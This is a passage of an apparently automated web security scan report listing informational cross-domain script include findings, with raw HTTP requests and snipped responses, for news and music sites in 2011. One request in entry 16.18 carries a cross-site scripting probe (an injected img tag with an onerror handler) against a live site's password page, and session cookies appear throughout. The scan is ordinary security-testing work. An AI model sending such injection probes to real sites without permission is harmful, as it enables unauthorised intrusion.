Date: Mon, 09 May 2011 14:07:50 GMT
Server: Apache/1.3.42 (Unix) mod_fastcgi/2.4.6
Set-Cookie: oudelay=1304950070; domain=www.ccnow.com; path=/; expires=Mon, 09-May-2011 15:07:50 GMT
Keep-Alive: timeout=15, max=150
Connection: Keep-Alive
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 14414

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Shopping cart Experts - CCNow Online Credit Card Processing and Merchant Acc
...[SNIP]...
<!-- -->
<script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...

16.17. http://www.clashmusic.com/news/sufjan-stevens-suffered-nervous-breakdown

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.clashmusic.com
Path:   /news/sufjan-stevens-suffered-nervous-breakdown

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /news/sufjan-stevens-suffered-nervous-breakdown HTTP/1.1
Host: www.clashmusic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:00:30 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: SESS5079a7bd09304b581fb1d164353615c5=47u27u5frb149p678dd9853b46; expires=Wed, 01-Jun-2011 17:33:50 GMT; path=/; domain=.clashmusic.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 09 May 2011 14:00:30 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 43192

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transititional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<div class="content">
<script src="http://widgets.twimg.com/j/2/widget.js"></script>
...[SNIP]...
</script><script type='text/javascript' src='http://disqus.com/forums/clash/embed.js'></script>
...[SNIP]...
<!-- End Quantcast tag -->

<script src="http://static.getclicky.com/68525.js" type="text/javascript"></script>
...[SNIP]...
</noscript>
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

16.18. http://www.clashmusic.com/user/a

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.clashmusic.com
Path:   /user/a

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /user/a HTTP/1.1
Host: www.clashmusic.com
Proxy-Connection: keep-alive
Referer: http://www.clashmusic.com/user/password37226--%3E%3Cimg%20src%3da%20onerror%3dalert(1)%3E025ae694cc3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _jsuid=5708256774256404140; __utmz=208768448.1304949660.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __qca=P0-2063829282-1304949659904; SESS5079a7bd09304b581fb1d164353615c5=4ekh37vh7uaj44s5g4323l0io1; __utma=208768448.205966012.1304949660.1304949660.1304949660.1; __utmc=208768448; __utmb=208768448.6.10.1304949660

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:13:42 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 09 May 2011 14:13:42 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 29873

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transititional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<div class="content">
<script src="http://widgets.twimg.com/j/2/widget.js"></script>
...[SNIP]...
<!-- End Quantcast tag -->

<script src="http://static.getclicky.com/68525.js" type="text/javascript"></script>
...[SNIP]...
</noscript>
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

16.19. http://www.clashmusic.com/user/password

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.clashmusic.com
Path:   /user/password

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /user/password HTTP/1.1
Host: www.clashmusic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _jsuid=5708256774256404140; __utmz=208768448.1304949660.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __qca=P0-2063829282-1304949659904; SESS5079a7bd09304b581fb1d164353615c5=4k0bkorgssjj327vn36gicua01; __utma=208768448.205966012.1304949660.1304949660.1304949660.1; __utmc=208768448; __utmb=208768448.2.10.1304949660

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:07:20 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 09 May 2011 14:07:24 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 30222

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transititional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<div class="content">
<script src="http://widgets.twimg.com/j/2/widget.js"></script>
...[SNIP]...
<!-- End Quantcast tag -->

<script src="http://static.getclicky.com/68525.js" type="text/javascript"></script>
...[SNIP]...
</noscript>
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

16.20. http://www.clashmusic.com/user/register

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.clashmusic.com
Path:   /user/register

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /user/register HTTP/1.1
Host: www.clashmusic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _jsuid=5708256774256404140; __utmz=208768448.1304949660.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __qca=P0-2063829282-1304949659904; SESS5079a7bd09304b581fb1d164353615c5=4k0bkorgssjj327vn36gicua01; __utma=208768448.205966012.1304949660.1304949660.1304949660.1; __utmc=208768448; __utmb=208768448.2.10.1304949660

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:07:09 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 09 May 2011 14:07:15 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 48395

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transititional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<div class="content">
<script src="http://widgets.twimg.com/j/2/widget.js"></script>
...[SNIP]...
<!-- End Quantcast tag -->

<script src="http://static.getclicky.com/68525.js" type="text/javascript"></script>
...[SNIP]...
</noscript>
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

16.21. http://www.facebook.com/plugins/comments.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/comments.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /plugins/comments.php?api_key=c87f9494a93b2590633af39d1b8e347f&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2fb777bd4%26origin%3Dhttp%253A%252F%252Fwww.indianasnewscenter.com%252Ff208516ccc%26relation%3Dparent.parent%26transport%3Dpostmessage&href=www.indianasnewscenter.com%2Fnews%2Flocal%2FAt-Noon-Casey-Anthony-Trial-Begins-In-Florida-Plus-More-121488004.html&locale=en_US&numposts=25&sdk=joey&width=630 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.indianasnewscenter.com/news/local/At-Noon-Casey-Anthony-Trial-Begins-In-Florida-Plus-More-121488004.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.32.120.114
X-Cnection: close
Date: Mon, 09 May 2011 13:59:16 GMT
Content-Length: 14072

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y5/r/Z6PtFE_aVAz.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...

16.22. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /plugins/like.php?href=http://www.orlandosentinel.com/business/os-cfb-cover-casey-tv-20110509,0,6839926.story&layout=button_count&show_faces=true&width=135&action=recommend&font&colorscheme=light&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.orlandosentinel.com/business/os-cfb-cover-casey-tv-20110509,0,6839926.story
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.32.120.130
X-Cnection: close
Date: Mon, 09 May 2011 13:59:33 GMT
Content-Length: 7014

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y0/r/7NS4A3NTFw2.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...

16.23. http://www.facebook.com/plugins/likebox.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /plugins/likebox.php?href=http%3A%2F%2Fwww.facebook.com%2Firishtimestheticket&width=300&colorscheme=light&connections=10&stream=false&header=false&height=270 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.irishtimes.com/newspaper/theticket/2011/0506/1224296203710.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.36.80.104
X-Cnection: close
Date: Mon, 09 May 2011 14:04:05 GMT
Content-Length: 12967

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yD/r/rZiaNe7iEDZ.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...

16.24. http://www.indianasnewscenter.com/news/local/At-Noon-Casey-Anthony-Trial-Begins-In-Florida-Plus-More-121488004.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.indianasnewscenter.com
Path:   /news/local/At-Noon-Casey-Anthony-Trial-Begins-In-Florida-Plus-More-121488004.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /news/local/At-Noon-Casey-Anthony-Trial-Begins-In-Florida-Plus-More-121488004.html HTTP/1.1
Host: www.indianasnewscenter.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Mon, 09 May 2011 13:49:37 GMT
Vary: Accept-Encoding
X-Server-Name: dv-c1-r2-u24-b9
Content-Type: text/html;charset=utf-8
Date: Mon, 09 May 2011 13:59:02 GMT
Connection: close
Set-Cookie: click_mobile=0
Content-Length: 71453

               
                                                                               <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
   "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-US">
<head>
<title>

   
                                   At Noon: Casey A
...[SNIP]...
</script>
<script type="text/javascript" src="http://pixel.quantserve.com/seg/p-9a3CzpxOy4iiQ.js"></script>
...[SNIP]...
<body class="parentnews path-news-local article" id="entry-121488004">
<script id="aptureScript" type="text/javascript" src="http://www.apture.com/js/apture.js?siteToken=pgKiQTB" charset="utf-8"></script>
...[SNIP]...
</div><script src="http://connect.facebook.net/en_US/all.js#appId=c87f9494a93b2590633af39d1b8e347f&amp;xfbml=1"></script>
...[SNIP]...
</a><script type='text/javascript' src='http://platform.twitter.com/widgets.js'></script>
...[SNIP]...
</a><script src='http://static.ak.fbcdn.net/connect.php/js/FB.Share' type='text/javascript'></script>
...[SNIP]...
</div><script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

16.25. http://www.irishtimes.com/newspaper/theticket/2011/0506/1224296203710.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.irishtimes.com
Path:   /newspaper/theticket/2011/0506/1224296203710.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /newspaper/theticket/2011/0506/1224296203710.html HTTP/1.1
Host: www.irishtimes.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Age: 100
Date: Mon, 09 May 2011 13:59:03 GMT
Expires: Mon, 09 May 2011 14:04:03 GMT
Cache-Control: max-age = 300
Connection: Keep-Alive
Via: NS-CACHE-6.0: 101
ETag: "12c78d-f63a-4dc7eff3"
Server: Apache
Last-Modified: Mon, 09 May 2011 13:45:23 GMT
Accept-Ranges: bytes
Keep-Alive: timeout=300, max=1994
Content-Type: text/html; charset=US-ASCII
Cache-Control: private
Content-Length: 63034

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><head><meta http-equiv="Content-Type" content="text/html; charset=US-ASC
...[SNIP]...
</script><script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=irishtimes"></script>
...[SNIP]...
</script><script xmlns="http://www.w3.org/1999/xhtml" language="javascript" type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"><!--Batch Build Fix: Comment added so script is recognised-->
...[SNIP]...
<!-- End SiteCatalyst code version: H.15.1. --><script xmlns="http://www.w3.org/1999/xhtml" type="text/javascript" src="http://t.bmmetrix.com/ie/irishtimes_ie/bmv13.js"><!-- BlueMetrics JS code -->
...[SNIP]...

16.26. http://www.nme.com/news/sufjan-stevens/56527

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nme.com
Path:   /news/sufjan-stevens/56527

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /news/sufjan-stevens/56527 HTTP/1.1
Host: www.nme.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
NmeAkamaiMatch: 1
IgniteAkamaiMatch: 1
X-Wf-Protocol-1: http://meta.wildfirehq.org/Protocol/JsonStream/0.2
X-Wf-1-Plugin-1: http://meta.firephp.org/Wildfire/Plugin/FirePHP/Library-FirePHPCore/0.3
X-Wf-1-Structure-1: http://meta.firephp.org/Wildfire/Structure/FirePHP/FirebugConsole/0.1
X-Wf-1-1-1-1: 55|[{"Type":"LOG"},"now: Mon, 09 May 2011 15:00:36 +0100"]|
X-Wf-1-1-1-2: 63|[{"Type":"LOG"},"id: 56830e3f97674f92659a8a7e54b9b44fea17850e"]|
X-Wf-1-1-1-3: 23|[{"Type":"LOG"},"li: "]|
X-Wf-1-1-1-4: 24|[{"Type":"LOG"},"cs: 1"]|
X-Wf-1-1-1-5: 23|[{"Type":"LOG"},"rc: "]|
X-Wf-1-1-1-6: 24|[{"Type":"LOG"},"ic: 1"]|
X-Wf-1-1-1-7: 28|[{"Type":"LOG"},"ttl: 3560"]|
X-Wf-1-1-1-8: 29|[{"Type":"LOG"},"mu: 786432"]|
X-Wf-1-1-1-9: 41|[{"Type":"LOG"},"ts: 0.0014510154724121"]|
X-Wf-1-1-1-10: 25|[{"Type":"LOG"},"ct: us"]|
Content-Type: text/html
Vary: Accept-Encoding
Expires: Mon, 09 May 2011 14:00:37 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Mon, 09 May 2011 14:00:37 GMT
Connection: close
Set-Cookie: ServerID=1043; path=/
Set-Cookie: PHPSESSID=nb14qm2u5j3cpt8fp8muap0hh1; path=/; domain=.nme.com
Set-Cookie: ignite_loggedin=false; expires=Wed, 08-Jun-2011 14:00:36 GMT; path=/; domain=.nme.com
Set-Cookie: browsertype=web; expires=Tue, 10-May-2011 14:00:37 GMT; path=/; domain=.nme.com
Content-Length: 62535

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/
...[SNIP]...
</script>
<script type="text/javascript" language="JavaScript" src="http://cdn.krxd.net/krux.js"></script>
...[SNIP]...
</script>
   <script language="JavaScript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</div>
       <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.2.6/jquery.min.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.google.co.uk/cse/brand?form=header-search-box&amp;lang=en"></script>
<script type="text/javascript" src="http://www.google.co.uk/cse/brand?form=footer-search-box&amp;lang=en"></script>
...[SNIP]...

16.27. http://www.orlandosentinel.com/business/os-cfb-cover-casey-tv-20110509,0,6839926.story

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.orlandosentinel.com
Path:   /business/os-cfb-cover-casey-tv-20110509,0,6839926.story

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /business/os-cfb-cover-casey-tv-20110509,0,6839926.story HTTP/1.1
Host: www.orlandosentinel.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
P3P: policyref="http://www.orlandosentinel.com/w3c/p3p.xml", CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi TELi OUR DELa SAMi UNRi OTRi IND PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE"
Content-Type: text/html; charset=UTF-8
X-Instance-Name: i7s30z1n1
Last-Modified: Mon, 09 May 2011 13:58:29 GMT
Vary: Accept-Encoding
Cache-Control: private, max-age=142
Date: Mon, 09 May 2011 13:59:15 GMT
Connection: close
Content-Length: 227706


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//E
...[SNIP]...
<div class="ad centerAd topLeaderboard">
           <script language="JavaScript" src="http://ad.doubleclick.net/adj/trb.orlandosentinel/biz;;ptype=s;slug=os-cfb-cover-casey-tv-20110509;rg=ur;pos=T;dcopt=ist;sz=728x90;tile=1;ca=Television;en=TwitterInc;at=Television;at=ArtsandCulture;at=MassMedia;at=CrimeLawandJustice;at=Trials;u=http://www.orlandosentinel.com/business/os-cfb-cover-casey-tv-20110509,0,6839926.story;ord=77756451?" type="text/javascript"></script>
...[SNIP]...
</a>
               <script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</span>
               
               <script type="text/javascript" src="http://w.sharethis.com/button/buttons.js"></script>
...[SNIP]...
<div id="story-leftrail-ad">
    <script language="JavaScript" src="http://ad.doubleclick.net/adj/trb.orlandosentinel/biz;;ptype=s;slug=os-cfb-cover-casey-tv-20110509;rg=ur;pos=2;sz=234x60;tile=2;ca=Television;en=TwitterInc;at=Television;at=ArtsandCulture;at=MassMedia;at=CrimeLawandJustice;at=Trials;u=http://www.orlandosentinel.com/business/os-cfb-cover-casey-tv-20110509,0,6839926.story;ord=77756451?" type="text/javascript"></script>
...[SNIP]...
</a>
               <script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</span>
               
               <script type="text/javascript" src="http://w.sharethis.com/button/buttons.js"></script>
...[SNIP]...
<td vAlign="middle">

<script language="JavaScript" src="http://ad.doubleclick.net/adj/trb.orlandosentinel/biz;;ptype=s;slug=os-cfb-cover-casey-tv-20110509;rg=ur;pos=1;sz=300x250,336x280;tile=3;ca=Television;en=TwitterInc;at=Television;at=ArtsandCulture;at=MassMedia;at=CrimeLawandJustice;at=Trials;u=http://www.orlandosentinel.com/business/os-cfb-cover-casey-tv-20110509,0,6839926.story;ord=77756451?" type="text/javascript"></script>
...[SNIP]...
<div id="fbfan"><script language="javascript" type="text/javascript" src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US"></script>
...[SNIP]...
<div class="module blurb ">
<script src="http://widgets.twimg.com/j/2/widget.js"></script>
...[SNIP]...
<div class="module blurb ">
<script src="http://admatch-syndication.mochila.com/js/mochilaCompositeWidget.js"></script>
...[SNIP]...
<div class="skyScraper">
       
<script language="JavaScript" src="http://ad.doubleclick.net/adj/trb.orlandosentinel/biz;;ptype=s;slug=os-cfb-cover-casey-tv-20110509;rg=ur;pos=1;sz=160x600,300x600;tile=4;ca=Television;en=TwitterInc;at=Television;at=ArtsandCulture;at=MassMedia;at=CrimeLawandJustice;at=Trials;u=http://www.orlandosentinel.com/business/os-cfb-cover-casey-tv-20110509,0,6839926.story;ord=77756451?" type="text/javascript"></script>
...[SNIP]...
<div class="ad centerAd">

<script language="JavaScript" src="http://ad.doubleclick.net/adj/trb.orlandosentinel/biz;;ptype=s;slug=os-cfb-cover-casey-tv-20110509;rg=ur;pos=B;sz=728x91;tile=5;ca=Television;en=TwitterInc;at=Television;at=ArtsandCulture;at=MassMedia;at=CrimeLawandJustice;at=Trials;u=http://www.orlandosentinel.com/business/os-cfb-cover-casey-tv-20110509,0,6839926.story;ord=77756451?" type="text/javascript"></script>
...[SNIP]...
<div id="inlineHeaderAd" style="position:absolute; top: 35px; right: 10px; height: 64px;">
<script language="JavaScript" src="http://ad.doubleclick.net/adj/trb.orlandosentinel/biz;;ptype=s;slug=os-cfb-cover-casey-tv-20110509;rg=ur;pos=1;sz=234x60;tile=6;ca=Television;en=TwitterInc;at=Television;at=ArtsandCulture;at=MassMedia;at=CrimeLawandJustice;at=Trials;u=http://www.orlandosentinel.com/business/os-cfb-cover-casey-tv-20110509,0,6839926.story;ord=77756451?" type="text/javascript"></script>
...[SNIP]...
<!-- Tacoda Javascript -->

<SCRIPT SRC="http://an.tacoda.net/an/g10007/slf.js" LANGUAGE="JavaScript"></SCRIPT>
...[SNIP]...
<!-- START REVENUE SCIENCE PIXELLING CODE -->
<script src="http://js.revsci.net/gateway/gw.js?csid=B08725"></script>
...[SNIP]...

16.28. http://www.orlandosentinel.com/business/transparent

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.orlandosentinel.com
Path:   /business/transparent

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /business/transparent HTTP/1.1
Host: www.orlandosentinel.com
Proxy-Connection: keep-alive
Referer: http://www.orlandosentinel.com/business/os-cfb-cover-casey-tv-20110509,0,6839926.story
